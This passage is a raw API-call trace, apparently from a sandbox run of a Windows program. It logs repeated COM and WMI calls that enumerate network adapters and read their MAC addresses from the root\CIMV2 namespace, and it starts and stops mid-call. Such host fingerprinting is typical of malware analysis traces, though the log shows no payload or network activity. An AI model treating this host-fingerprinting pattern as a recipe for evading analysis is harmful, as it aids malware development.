riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.329] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.329] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef08*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef08*=0x15, pszText=0x0) returned 0x0 [0065.329] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.329] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.329] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.329] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.330] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.330] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.330] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef08*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef08*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.330] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.330] IWbemClassObject:Get (in: This=0x12b27d0, wszName="MacAddress", lFlags=0, pVal=0xf2eec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327b12c*=0, plFlavor=0x327b130*=0 | out: pVal=0xf2eec8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="00:30:55:54:DB:4A", varVal2=0x0), pType=0x327b12c*=8, plFlavor=0x327b130*=0) returned 0x0 [0065.330] SysStringLen (param_1="00:30:55:54:DB:4A") returned 0x11 [0065.330] IWbemClassObject:Get (in: This=0x12b27d0, wszName="MacAddress", lFlags=0, pVal=0xf2eecc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327b12c*=8, plFlavor=0x327b130*=0 | out: pVal=0xf2eecc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="00:30:55:54:DB:4A", varVal2=0x0), pType=0x327b12c*=8, plFlavor=0x327b130*=0) returned 0x0 [0065.330] SysStringLen (param_1="00:30:55:54:DB:4A") returned 0x11 [0065.330] CoGetContextToken (in: pToken=0xf2ed58 | out: pToken=0xf2ed58) returned 0x0 [0065.330] CoGetContextToken (in: pToken=0xf2ed18 | out: pToken=0xf2ed18) returned 0x0 [0065.330] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.330] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed90 | out: ppvObject=0xf2ed90*=0x12b3f50) returned 0x0 [0065.330] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.330] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef0c | out: puCount=0xf2ef0c*=0x2) returned 0x0 [0065.330] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.330] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.331] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.331] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.331] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.331] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef08*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef08*=0x15, pszText=0x0) returned 0x0 [0065.331] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.331] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.331] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.331] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.331] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.331] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef08*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef08*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.331] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.331] IWbemClassObject:Get (in: This=0x12b27d0, wszName="MacAddress", lFlags=0, pVal=0xf2eec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327b214*=0, plFlavor=0x327b218*=0 | out: pVal=0xf2eec8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="00:30:55:54:DB:4A", varVal2=0x0), pType=0x327b214*=8, plFlavor=0x327b218*=0) returned 0x0 [0065.331] SysStringLen (param_1="00:30:55:54:DB:4A") returned 0x11 [0065.331] IWbemClassObject:Get (in: This=0x12b27d0, wszName="MacAddress", lFlags=0, pVal=0xf2eecc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327b214*=8, plFlavor=0x327b218*=0 | out: pVal=0xf2eecc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="00:30:55:54:DB:4A", varVal2=0x0), pType=0x327b214*=8, plFlavor=0x327b218*=0) returned 0x0 [0065.331] SysStringLen (param_1="00:30:55:54:DB:4A") returned 0x11 [0065.332] CoGetContextToken (in: pToken=0xf2ecbc | out: pToken=0xf2ecbc) returned 0x0 [0065.332] IUnknown:AddRef (This=0x12b85b8) returned 0x3 [0065.332] IEnumWbemClassObject:Next (in: This=0x12b85b8, lTimeout=-1, uCount=0x1, apObjects=0x1271d78, puReturned=0x327a99c | out: apObjects=0x1271d78*=0x12b1fd8, puReturned=0x327a99c*=0x1) returned 0x0 [0065.333] IUnknown:QueryInterface (in: This=0x12b1fd8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e2c8 | out: ppvObject=0xf2e2c8*=0x12b1fd8) returned 0x0 [0065.333] IUnknown:QueryInterface (in: This=0x12b1fd8, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e284 | out: ppvObject=0xf2e284*=0x0) returned 0x80004002 [0065.333] IUnknown:QueryInterface (in: This=0x12b1fd8, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e178 | out: ppvObject=0xf2e178*=0x0) returned 0x80004002 [0065.333] IUnknown:AddRef (This=0x12b1fd8) returned 0x3 [0065.333] CoGetContextToken (in: pToken=0xf2e110 | out: pToken=0xf2e110) returned 0x0 [0065.333] CoGetContextToken (in: pToken=0xf2e0d4 | out: pToken=0xf2e0d4) returned 0x0 [0065.333] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e108 | out: ppvObject=0xf2e108*=0x126b49c) returned 0x0 [0065.333] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e138 | out: pAptType=0xf2e138*=3) returned 0x0 [0065.333] IUnknown:Release (This=0x126b49c) returned 0x1 [0065.333] IUnknown:QueryInterface (in: This=0x12b1fd8, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e0f8 | out: ppvObject=0xf2e0f8*=0x12b1fdc) returned 0x0 [0065.333] IMarshal:GetUnmarshalClass (in: This=0x12b1fdc, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e100 | out: pCid=0xf2e100*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0065.333] IUnknown:Release (This=0x12b1fdc) returned 0x3 [0065.334] CoGetContextToken (in: pToken=0xf2e108 | out: pToken=0xf2e108) returned 0x0 [0065.334] IUnknown:AddRef (This=0x12b1fd8) returned 0x4 [0065.334] IUnknown:QueryInterface (in: This=0x12b1fd8, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e17c | out: ppvObject=0xf2e17c*=0x0) returned 0x80004002 [0065.334] IUnknown:Release (This=0x12b1fd8) returned 0x3 [0065.334] IUnknown:Release (This=0x12b1fd8) returned 0x2 [0065.334] CoGetContextToken (in: pToken=0xf2e568 | out: pToken=0xf2e568) returned 0x0 [0065.334] CoGetContextToken (in: pToken=0xf2e528 | out: pToken=0xf2e528) returned 0x0 [0065.334] IUnknown:AddRef (This=0x12b1fd8) returned 0x3 [0065.334] IUnknown:QueryInterface (in: This=0x12b1fd8, riid=0xf2e5a4*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xf2e5a0 | out: ppvObject=0xf2e5a0*=0x12b1fd8) returned 0x0 [0065.334] IUnknown:Release (This=0x12b1fd8) returned 0x3 [0065.334] IUnknown:Release (This=0x12b1fd8) returned 0x2 [0065.334] IUnknown:Release (This=0x12b1fd8) returned 0x1 [0065.334] IUnknown:Release (This=0x12b85b8) returned 0x2 [0065.334] CoGetContextToken (in: pToken=0xf2ee50 | out: pToken=0xf2ee50) returned 0x0 [0065.334] IUnknown:AddRef (This=0x12b1fd8) returned 0x2 [0065.334] IWbemClassObject:Get (in: This=0x12b1fd8, wszName="__GENUS", lFlags=0, pVal=0xf2eecc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef80*=0, plFlavor=0xf2ef7c*=0 | out: pVal=0xf2eecc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xf2ef80*=3, plFlavor=0xf2ef7c*=64) returned 0x0 [0065.335] IWbemClassObject:Get (in: This=0x12b1fd8, wszName="__PATH", lFlags=0, pVal=0xf2eeac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=0, plFlavor=0xf2ef60*=0 | out: pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64) returned 0x0 [0065.335] IWbemClassObject:Get (in: This=0x12b1fd8, wszName="__RELPATH", lFlags=0, pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64 | out: pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64) returned 0x0 [0065.335] CoGetContextToken (in: pToken=0xf2ed84 | out: pToken=0xf2ed84) returned 0x0 [0065.335] CoGetContextToken (in: pToken=0xf2ed44 | out: pToken=0xf2ed44) returned 0x0 [0065.335] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edbc | out: ppvObject=0xf2edbc*=0x12b3f50) returned 0x0 [0065.335] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.335] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef38 | out: puCount=0xf2ef38*=0x2) returned 0x0 [0065.335] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.335] CoGetContextToken (in: pToken=0xf2ed74 | out: pToken=0xf2ed74) returned 0x0 [0065.335] CoGetContextToken (in: pToken=0xf2ed34 | out: pToken=0xf2ed34) returned 0x0 [0065.335] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edac | out: ppvObject=0xf2edac*=0x12b3f50) returned 0x0 [0065.335] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.335] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef34*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef34*=0x15, pszText=0x0) returned 0x0 [0065.335] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.335] CoGetContextToken (in: pToken=0xf2ed74 | out: pToken=0xf2ed74) returned 0x0 [0065.335] CoGetContextToken (in: pToken=0xf2ed34 | out: pToken=0xf2ed34) returned 0x0 [0065.336] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edac | out: ppvObject=0xf2edac*=0x12b3f50) returned 0x0 [0065.336] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.336] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef34*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef34*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.336] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.336] CoGetContextToken (in: pToken=0xf2ed58 | out: pToken=0xf2ed58) returned 0x0 [0065.336] CoGetContextToken (in: pToken=0xf2ed18 | out: pToken=0xf2ed18) returned 0x0 [0065.336] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed90 | out: ppvObject=0xf2ed90*=0x12b3f50) returned 0x0 [0065.336] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.336] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef0c | out: puCount=0xf2ef0c*=0x2) returned 0x0 [0065.336] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.336] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.336] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.336] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.336] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.336] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef08*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef08*=0x15, pszText=0x0) returned 0x0 [0065.336] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.336] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.336] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.336] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.336] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.336] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef08*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef08*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.336] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.337] IWbemClassObject:Get (in: This=0x12b1fd8, wszName="MacAddress", lFlags=0, pVal=0xf2eec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327b740*=0, plFlavor=0x327b744*=0 | out: pVal=0xf2eec8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327b740*=8, plFlavor=0x327b744*=32) returned 0x0 [0065.337] IWbemClassObject:Get (in: This=0x12b1fd8, wszName="MacAddress", lFlags=0, pVal=0xf2eecc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327b740*=8, plFlavor=0x327b744*=32 | out: pVal=0xf2eecc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327b740*=8, plFlavor=0x327b744*=32) returned 0x0 [0065.337] CoGetContextToken (in: pToken=0xf2ecbc | out: pToken=0xf2ecbc) returned 0x0 [0065.337] IUnknown:AddRef (This=0x12b85b8) returned 0x3 [0065.337] IEnumWbemClassObject:Next (in: This=0x12b85b8, lTimeout=-1, uCount=0x1, apObjects=0x1271d78, puReturned=0x327a99c | out: apObjects=0x1271d78*=0x12b24a0, puReturned=0x327a99c*=0x1) returned 0x0 [0065.338] IUnknown:QueryInterface (in: This=0x12b24a0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e2c8 | out: ppvObject=0xf2e2c8*=0x12b24a0) returned 0x0 [0065.339] IUnknown:QueryInterface (in: This=0x12b24a0, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e284 | out: ppvObject=0xf2e284*=0x0) returned 0x80004002 [0065.339] IUnknown:QueryInterface (in: This=0x12b24a0, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e178 | out: ppvObject=0xf2e178*=0x0) returned 0x80004002 [0065.339] IUnknown:AddRef (This=0x12b24a0) returned 0x3 [0065.339] CoGetContextToken (in: pToken=0xf2e110 | out: pToken=0xf2e110) returned 0x0 [0065.339] CoGetContextToken (in: pToken=0xf2e0d4 | out: pToken=0xf2e0d4) returned 0x0 [0065.339] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e108 | out: ppvObject=0xf2e108*=0x126b49c) returned 0x0 [0065.339] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e138 | out: pAptType=0xf2e138*=3) returned 0x0 [0065.339] IUnknown:Release (This=0x126b49c) returned 0x1 [0065.339] IUnknown:QueryInterface (in: This=0x12b24a0, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e0f8 | out: ppvObject=0xf2e0f8*=0x12b24a4) returned 0x0 [0065.339] IMarshal:GetUnmarshalClass (in: This=0x12b24a4, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e100 | out: pCid=0xf2e100*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0065.339] IUnknown:Release (This=0x12b24a4) returned 0x3 [0065.339] CoGetContextToken (in: pToken=0xf2e108 | out: pToken=0xf2e108) returned 0x0 [0065.339] IUnknown:AddRef (This=0x12b24a0) returned 0x4 [0065.339] IUnknown:QueryInterface (in: This=0x12b24a0, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e17c | out: ppvObject=0xf2e17c*=0x0) returned 0x80004002 [0065.339] IUnknown:Release (This=0x12b24a0) returned 0x3 [0065.339] IUnknown:Release (This=0x12b24a0) returned 0x2 [0065.339] CoGetContextToken (in: pToken=0xf2e568 | out: pToken=0xf2e568) returned 0x0 [0065.339] CoGetContextToken (in: pToken=0xf2e528 | out: pToken=0xf2e528) returned 0x0 [0065.339] IUnknown:AddRef (This=0x12b24a0) returned 0x3 [0065.339] IUnknown:QueryInterface (in: This=0x12b24a0, riid=0xf2e5a4*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xf2e5a0 | out: ppvObject=0xf2e5a0*=0x12b24a0) returned 0x0 [0065.339] IUnknown:Release (This=0x12b24a0) returned 0x3 [0065.340] IUnknown:Release (This=0x12b24a0) returned 0x2 [0065.340] IUnknown:Release (This=0x12b24a0) returned 0x1 [0065.340] IUnknown:Release (This=0x12b85b8) returned 0x2 [0065.340] CoGetContextToken (in: pToken=0xf2ee50 | out: pToken=0xf2ee50) returned 0x0 [0065.340] IUnknown:AddRef (This=0x12b24a0) returned 0x2 [0065.340] IWbemClassObject:Get (in: This=0x12b24a0, wszName="__GENUS", lFlags=0, pVal=0xf2eecc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef80*=0, plFlavor=0xf2ef7c*=0 | out: pVal=0xf2eecc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xf2ef80*=3, plFlavor=0xf2ef7c*=64) returned 0x0 [0065.340] IWbemClassObject:Get (in: This=0x12b24a0, wszName="__PATH", lFlags=0, pVal=0xf2eeac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=0, plFlavor=0xf2ef60*=0 | out: pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64) returned 0x0 [0065.340] IWbemClassObject:Get (in: This=0x12b24a0, wszName="__RELPATH", lFlags=0, pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64 | out: pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64) returned 0x0 [0065.340] CoGetContextToken (in: pToken=0xf2ed84 | out: pToken=0xf2ed84) returned 0x0 [0065.340] CoGetContextToken (in: pToken=0xf2ed44 | out: pToken=0xf2ed44) returned 0x0 [0065.340] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.340] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edbc | out: ppvObject=0xf2edbc*=0x12b3f50) returned 0x0 [0065.340] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.340] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef38 | out: puCount=0xf2ef38*=0x2) returned 0x0 [0065.340] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.340] CoGetContextToken (in: pToken=0xf2ed74 | out: pToken=0xf2ed74) returned 0x0 [0065.340] CoGetContextToken (in: pToken=0xf2ed34 | out: pToken=0xf2ed34) returned 0x0 [0065.340] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.340] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edac | out: 